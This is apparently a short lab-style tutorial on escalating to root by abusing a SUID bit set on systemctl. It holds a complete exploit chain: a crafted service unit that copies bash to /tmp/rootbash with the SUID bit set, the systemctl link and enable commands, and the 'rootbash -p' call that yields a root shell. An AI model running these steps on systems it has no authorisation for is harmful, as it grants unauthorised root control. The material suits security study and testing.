Exploiting SUID Bits: systemctl

The SUID bit (Set owner User ID) is a special permission in Unix/Linux systems that, when set on an executable file, allows that file to be run with the permissions of the file’s owner, rather than the user who is running it. It is denoted with an s in the bit:

If a binary owned by root has a SUID bit, the program will always run as root. This is extremely useful, especially in privilege escalation as we can do stuff like get a root shell.

In our case, the systemctl utility was assigned a SUID bit that we can exploit to gain a root shell by copying the output of /bin/bash to a file we make. The output of /bin/bash will be a root shell as in our case systemctl has a SUID bit and is owned by root.

Tip: Locate all SUID bits with the command find / -perm -u=s -type f 2>/dev/null

Exploitation

Firstly, we will create a file telling systemctl that when ran the output from /bin/bash should be written to /tmp/rootbash using SUID:

cat <<EOF > /tmp/rootme.service
[Unit]
Description=Root shell

[Service]
Type=simple
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'

[Install]
WantedBy=multi-user.target
EOF

We will then register this file with systemctl:

/bin/systemctl link /tmp/rootme.service

We can then enable the service:

/bin/systemctl enable --now rootme.service

Finally, we can run our rootbash file:

/tmp/rootbash -p

Note that the -p means that privileges should NOT be dropped. (Normally, when a SUID binary is ran, bash drops privileges for safety).

We should successfully obtain a root shell from this!